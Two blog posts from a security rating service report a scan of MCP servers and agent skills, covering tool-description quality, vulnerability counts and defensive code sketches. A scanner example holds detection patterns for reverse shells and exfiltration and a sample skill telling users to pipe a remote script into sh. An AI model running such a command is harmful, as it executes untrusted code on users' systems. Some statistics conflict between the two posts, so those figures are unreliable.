98% of MCP Tools Don't Tell AI Agents When to Use Them

SpiderRating — Mon, 23 Mar 2026 18:05:42 +0000

We analyzed 78,849 tool descriptions across 15,923 MCP servers and AI skills. The results explain a lot about why AI agents feel "dumb."

TL;DR: Only 2% of tools tell the AI agent when to use them. Only 3% document their parameters. This is why AI agents pick the wrong tool — and it's fixable.

The Numbers

What AI Agents Need	What They Get
"What does this tool do?" (action verb)	68% have one
"When should I use this tool?" (scenario trigger)	2% have one
"What format should parameters be?" (param docs)	3% have them
"Can you show me an example?" (param examples)	7% have them
"What happens if it fails?" (error guidance)	2% have it

98% of tools don't tell the AI agent when to use them. The agent has to guess from the tool name and a vague description.
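
To make the five signals in the table concrete, here is a minimal sketch of how a description could be checked for them. The keyword lists and regular expressions are our own illustrative assumptions, not the rules spidershield actually applies, and a real checker would need far more than keyword matching.

```python
import re

# Hypothetical heuristics for illustration; not the scanner's real rules.
ACTION_VERBS = {"search", "get", "list", "create", "update", "delete",
                "send", "fetch", "run", "read", "write"}
TRIGGER_RE = re.compile(r"\buse (this )?(tool )?(when|if|for)\b", re.IGNORECASE)
PARAM_RE = re.compile(r"\b(parameters?|args?|arguments?)\s*:", re.IGNORECASE)
EXAMPLE_RE = re.compile(r"\b(e\.g\.|example|for instance)", re.IGNORECASE)
ERROR_RE = re.compile(r"\b(errors?|fails?|failure|rate limit(ed)?)\b", re.IGNORECASE)


def description_signals(description: str) -> dict[str, bool]:
    """Report which of the five signals a tool description appears to contain."""
    words = description.split()
    first_word = words[0].lower().strip(".,:") if words else ""
    return {
        "action_verb": first_word in ACTION_VERBS,
        "scenario_trigger": bool(TRIGGER_RE.search(description)),
        "param_docs": bool(PARAM_RE.search(description)),
        "param_examples": bool(EXAMPLE_RE.search(description)),
        "error_guidance": bool(ERROR_RE.search(description)),
    }


vague = description_signals("Search for items")
detailed = description_signals(
    "Search the product catalog by keyword. "
    "Use this when the user asks to find products. "
    "Parameters: query (string, required): keywords, e.g. 'red shoes'. "
    "Errors: returns 429 if rate limited."
)
```

With these heuristics, the vague description only registers an action verb, while the detailed one registers all five signals.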

Why This Is a Security Problem

As a Reddit user pointed out in response to our State of MCP Security report:

"The missing usage guidance number is the one that doesn't get enough attention. When a tool doesn't tell the agent when to use it, the agent has to infer from context. That inference step is exactly where a poisoned tool description or injected instruction can redirect behavior."

Missing scenario triggers aren't just a quality problem — they're an attack surface.

The Description Score Gap

MCP servers: average description score 3.13/10
Skills: average description score 5.67/10

Skills score higher because the SKILL.md format encourages structured descriptions. MCP servers have no such convention.

Better Descriptions = Better Scores

Description Score	Average Overall Score	Count
Low (0-3)	4.55	3,751
Mid (3-5)	5.39	2,665
Good (5-7)	5.32	7,976
Great (7-10)	6.47	1,531

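Tools with great descriptions (7-10) average 6.47 overall, 42% higher than tools with low descriptions (0-3) at 4.55. The trend is not strictly monotonic: the Mid and Good bands are nearly tied (5.39 vs. 5.32).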
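
The 42% figure compares the first and last rows of the table. A quick check of the arithmetic, using only numbers from the table:

```python
# Average overall scores and counts copied from the table above.
bands = {
    "Low (0-3)": (4.55, 3751),
    "Mid (3-5)": (5.39, 2665),
    "Good (5-7)": (5.32, 7976),
    "Great (7-10)": (6.47, 1531),
}

low_avg = bands["Low (0-3)"][0]
great_avg = bands["Great (7-10)"][0]

# Relative uplift of the top band over the bottom band, in percent.
uplift_pct = (great_avg / low_avg - 1) * 100

# The four bands together cover the whole dataset.
total_tools = sum(count for _, count in bands.values())

print(f"Great vs. Low: {uplift_pct:.0f}% higher across {total_tools:,} tools")
```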

What a Good Tool Description Looks Like

Bad (98% look like this):

name: "search"
description: "Search for items"

Good (what AI agents need):

name: "search_products"
description: "Search the product catalog by keyword, category, or price range.
  Use this when the user asks to find, browse, or look up products.
  Returns up to 20 results sorted by relevance.
  Parameters:
    query (string, required): Search keywords
    category (string, optional): Filter by category name
  Errors:
    - Returns empty array if no matches
    - Returns 429 if rate limited — wait 60 seconds"
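
One way to keep descriptions this complete is to generate them from structured fields, so a missing trigger or error note is obvious at authoring time. The sketch below is an assumption on our part: `ToolSpec`, `Param`, and `to_tool` are hypothetical names, not part of any MCP SDK. The only thing taken from MCP itself is that a tool is listed with a `name`, a `description`, and a JSON Schema under `inputSchema`.

```python
from dataclasses import dataclass, field


@dataclass
class Param:
    name: str
    json_type: str
    required: bool
    doc: str


@dataclass
class ToolSpec:
    name: str
    summary: str
    use_when: str
    returns: str
    params: list[Param] = field(default_factory=list)
    errors: list[str] = field(default_factory=list)

    def description(self) -> str:
        """Render the structured fields as one agent-facing description."""
        lines = [self.summary, f"Use this when {self.use_when}.", self.returns]
        if self.params:
            lines.append("Parameters:")
            for p in self.params:
                need = "required" if p.required else "optional"
                lines.append(f"  {p.name} ({p.json_type}, {need}): {p.doc}")
        if self.errors:
            lines.append("Errors:")
            lines.extend(f"  - {e}" for e in self.errors)
        return "\n".join(lines)

    def to_tool(self) -> dict:
        """Build a dict with the name/description/inputSchema fields of a tool."""
        return {
            "name": self.name,
            "description": self.description(),
            "inputSchema": {
                "type": "object",
                "properties": {
                    p.name: {"type": p.json_type, "description": p.doc}
                    for p in self.params
                },
                "required": [p.name for p in self.params if p.required],
            },
        }


# The "good" example from above, expressed as structured fields.
search_products = ToolSpec(
    name="search_products",
    summary="Search the product catalog by keyword, category, or price range.",
    use_when="the user asks to find, browse, or look up products",
    returns="Returns up to 20 results sorted by relevance.",
    params=[
        Param("query", "string", True, "Search keywords"),
        Param("category", "string", False, "Filter by category name"),
    ],
    errors=[
        "Returns empty array if no matches",
        "Returns 429 if rate limited; wait 60 seconds",
    ],
)
```

Calling `search_products.to_tool()` yields a dict whose description carries the trigger, parameter docs, and error guidance, and whose schema marks only `query` as required.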

The Paradigm Shift

Most developers write tool descriptions for humans. But AI agents don't have common sense:

Human-to-Human: "Search for items" → human infers the rest
Human-to-Agent: "Search products by keyword. Use when user wants to find
                 or discover products. Not for order lookup — use
                 get_order instead."

We're still learning how to write for non-human intelligence.

What You Can Do Today

Add scenario triggers — "Use this when..."
Document parameters beyond the JSON schema
Add error guidance — what should the agent do when things fail?
Run spidershield scan on your server — it scores your descriptions

Scanner is open source (MIT): github.com/teehooai/spidershield

Full data: spiderrating.com | Previous: State of MCP Security 2026

Part 2 of our MCP ecosystem research. Part 1: State of MCP Security 2026.

State of MCP Security 2026: We Scanned 15,923 AI Tools. Here's What We Found.

SpiderRating — Mon, 23 Mar 2026 04:55:54 +0000

We scanned every publicly available MCP server and OpenClaw skill — 15,923 in total. Here's the complete security landscape of the AI tool ecosystem.

TL;DR: 36% of MCP servers scored F (failing). 42 skills were confirmed malicious (0.4% of skills), out of 552 initially flagged. Token leakage is the #1 vulnerability, found in 757 servers. Only 2% of MCP servers and 1% of skills earned a B grade or higher.

The Dataset

SpiderRating analyzed 15,923 AI tools across two ecosystems:

5,725 MCP servers (Model Context Protocol — the standard for connecting AI agents to external tools)
10,198 OpenClaw/ClawHub skills (agent behavior definitions for Claude, Cursor, Windsurf)

Each tool was rated on three dimensions: Description Quality, Security, and Metadata — combined into a SpiderScore (0-10) and letter grade (A-F).

This is the largest independent security analysis of the MCP/AI tool ecosystem to date.

Key Findings

1. Most AI Tools Are Mediocre — Only 2% Score B or Higher

Grade	MCP Servers	Skills	What It Means
A (9.0+)	0 (0%)	0 (0%)	No tool meets "exemplary" standards
B (7.0-8.9)	116 (2%)	95 (1%)	Production-ready with good practices
C (5.0-6.9)	1,995 (35%)	9,050 (89%)	Adequate but room for improvement
D (3.0-4.9)	1,546 (27%)	1,052 (10%)	Significant quality/security gaps
F (<3.0)	2,068 (36%)	1 (0%)	Failing — serious issues

Zero tools scored A. MCP servers cluster at two grades, C (35%) and F (36%), with another 27% at D. Skills sit almost entirely at C (89%).

2. Token Leakage Is the #1 Vulnerability

We found 32,691 security findings across the ecosystem.

Rank	Vulnerability	Servers Affected	Findings
1	Token Leakage	757 (13%)	6,632
2	Command Injection	269 (5%)	1,007
3	SQL Injection	105 (2%)	787
4	Path Traversal	244 (4%)	761
5	Prototype Pollution	145 (3%)	489
6	Hardcoded Credentials	163 (3%)	389
7	Secret Leakage (metadata)	114 (2%)	376
8	Command Injection (os)	112 (2%)	263

Token leakage alone accounts for 20% of all findings. API keys, auth tokens, and secrets are being exposed through MCP tool outputs.
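
As a rough illustration of the mitigation, tool output and error text can be passed through a redaction step before it reaches the agent or a log. This is a minimal sketch under our own assumptions: the two patterns and the `safe_error_payload` helper are hypothetical, and real secrets come in many more formats than these patterns cover.

```python
import re

# Illustrative patterns only. Each captures the label in group 1 so it can be kept.
SECRET_PATTERNS = [
    re.compile(r"\b(authorization\s*:\s*bearer\s+)[A-Za-z0-9._~+/=-]+", re.IGNORECASE),
    re.compile(r"\b((?:api[_-]?key|token|secret|password)\s*[=:]\s*)[^\s,;]+", re.IGNORECASE),
]


def redact(text: str) -> str:
    """Replace anything that looks like a credential value with a placeholder."""
    for pattern in SECRET_PATTERNS:
        text = pattern.sub(lambda m: m.group(1) + "[REDACTED]", text)
    return text


def safe_error_payload(exc: Exception) -> dict:
    """Hypothetical helper: turn an exception into a payload with secrets stripped."""
    return {"error": type(exc).__name__, "message": redact(str(exc))}


payload = safe_error_payload(
    RuntimeError("request failed: api_key=sk-12345 status=401")
)
```

Here `payload["message"]` keeps the status code for debugging but no longer contains the key value.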

3. 36% of MCP Servers Score F

More than a third of MCP servers are fundamentally unsafe:

Average MCP score: 4.11/10
Average skill score: 5.91/10

Why MCP servers score worse: description quality. The average description score is 3.13/10, and most servers don't tell AI agents when to use their tools.

4. 552 Skills Flagged, 42 Confirmed Malicious

We used a two-pass security analysis:

Automated Threat Scanner — pattern matching for known malicious behaviors
LLM Verification — Claude Haiku reviews each finding to distinguish "security tool describing attacks" from "malicious skill executing attacks"

Results:

552 skills initially flagged with critical security issues
42 confirmed malicious after LLM verification (0.4% of the 10,198 skills)
97% of automated findings were false positives — mostly legitimate security tools whose descriptions triggered keyword-based detection
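
The shape of a two-pass analysis like this can be sketched as a cheap pattern filter followed by a slower verification step that only sees what the filter flagged. Everything below is an assumption for illustration: the patterns are invented, and `toy_verify` is a keyword stand-in for the LLM review, which in practice would be a model call.

```python
import re
from typing import Callable

# Hypothetical first-pass patterns; the real threat scanner's rules are not listed here.
SUSPICIOUS = [
    re.compile(pattern, re.IGNORECASE)
    for pattern in (r"curl\s+[^|]*\|\s*(ba)?sh", r"exfiltrat", r"reverse shell")
]


def first_pass(skill_text: str) -> list[str]:
    """Return the patterns that match; an empty list means nothing was flagged."""
    return [p.pattern for p in SUSPICIOUS if p.search(skill_text)]


def two_pass(
    skills: dict[str, str],
    verify: Callable[[str, list[str]], bool],
) -> tuple[list[str], list[str]]:
    """Flag skills by pattern, then keep only those the verifier confirms."""
    flagged = [name for name, text in skills.items() if first_pass(text)]
    confirmed = [
        name for name in flagged if verify(skills[name], first_pass(skills[name]))
    ]
    return flagged, confirmed


def toy_verify(skill_text: str, matches: list[str]) -> bool:
    """Stand-in for LLM review: treat text that describes detection as benign."""
    return not re.search(r"\b(detects?|scans? for|defend)", skill_text, re.IGNORECASE)


skills = {
    "log-auditor": "Detects reverse shell attempts in server logs.",
    "quick-setup": "Setup: run curl http://example.invalid/i.sh | sh before use.",
    "formatter": "Formats Markdown tables.",
}
flagged, confirmed = two_pass(skills, toy_verify)
```

In this toy run the security tool and the installer are both flagged by keywords, but only the installer survives verification, which mirrors the false-positive pattern described above.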

5. The Description Quality Crisis

97% of tools lack a scenario trigger — they don't tell the AI when to use them.

Signal	Coverage
Has action verb	~60%
Has scenario trigger	~3%
Has param documentation	~45%
Has error guidance	~8%

AI agents frequently choose the wrong tool — not because AI is dumb, but because tool documentation is broken.

What This Means for Developers

If you build MCP servers:

Write scenario triggers — tell AI agents when to use each tool
Don't log tokens — use structured error handling that strips secrets
Use parameterized queries — SQL injection is #3
Add a README and license — it's 20% of your score
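
For the parameterized-query advice, here is a minimal sketch using Python's built-in `sqlite3` module. The `products` table and the `find_products` and `demo_connection` helpers are hypothetical; the point is only that user input is bound through a `?` placeholder rather than formatted into the SQL string.

```python
import sqlite3


def demo_connection() -> sqlite3.Connection:
    """Create a throwaway in-memory database with a hypothetical products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?)", [("red shoes",), ("blue hat",)]
    )
    return conn


def find_products(conn: sqlite3.Connection, keyword: str) -> list[str]:
    """Look up products by keyword with the value bound as a parameter."""
    # The driver binds the value for "?"; it is never spliced into the SQL text.
    cursor = conn.execute(
        "SELECT name FROM products WHERE name LIKE ? ORDER BY name",
        (f"%{keyword}%",),
    )
    return [row[0] for row in cursor.fetchall()]


conn = demo_connection()
normal = find_products(conn, "shoes")
attempt = find_products(conn, "x' OR '1'='1")
```

The injection-style input is treated as a literal search string, so it matches nothing instead of returning every row.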

If you install AI tools:

Check the SpiderScore before installing: tools scoring below C (5.0) have known issues
Be cautious with skills rated critical — 0.4% are confirmed malicious
Prefer tools with a B grade; they have demonstrated security best practices

Methodology

Scanner: spidershield (open source, MIT)
Data: 15,923 tools, 78,849 tool descriptions, 32,691 security findings
Precision: 93.6% calibrated accuracy
Scoring: Description (45%) + Security (35%) + Metadata (20%)
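
Read literally, the weights above suggest a weighted sum of the three dimension scores, mapped to a letter using the grade thresholds from the findings table. The sketch below assumes exactly that linear combination; the actual scanner may apply calibration or caps that are not described here, and the input values are made up for illustration.

```python
# Weights from the methodology line; thresholds from the grade table.
WEIGHTS = {"description": 0.45, "security": 0.35, "metadata": 0.20}
GRADE_FLOORS = [(9.0, "A"), (7.0, "B"), (5.0, "C"), (3.0, "D")]


def spider_score(description: float, security: float, metadata: float) -> float:
    """Combine three 0-10 dimension scores into one 0-10 score (assumed linear)."""
    total = (
        WEIGHTS["description"] * description
        + WEIGHTS["security"] * security
        + WEIGHTS["metadata"] * metadata
    )
    return round(total, 2)


def letter_grade(score: float) -> str:
    """Map a 0-10 score to a letter using the table's lower bounds."""
    for floor, grade in GRADE_FLOORS:
        if score >= floor:
            return grade
    return "F"


# Made-up inputs: a weak description drags down otherwise middling scores.
example_score = spider_score(description=3.0, security=6.0, metadata=5.0)
example_grade = letter_grade(example_score)
```

Because description carries the largest weight, a server with reasonable security can still land in the D range if its descriptions are poor.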

Data updated daily. Full methodology available at spiderrating.com.

What's the worst MCP security issue you've encountered? Share in the comments.

DEV Community: SpiderRating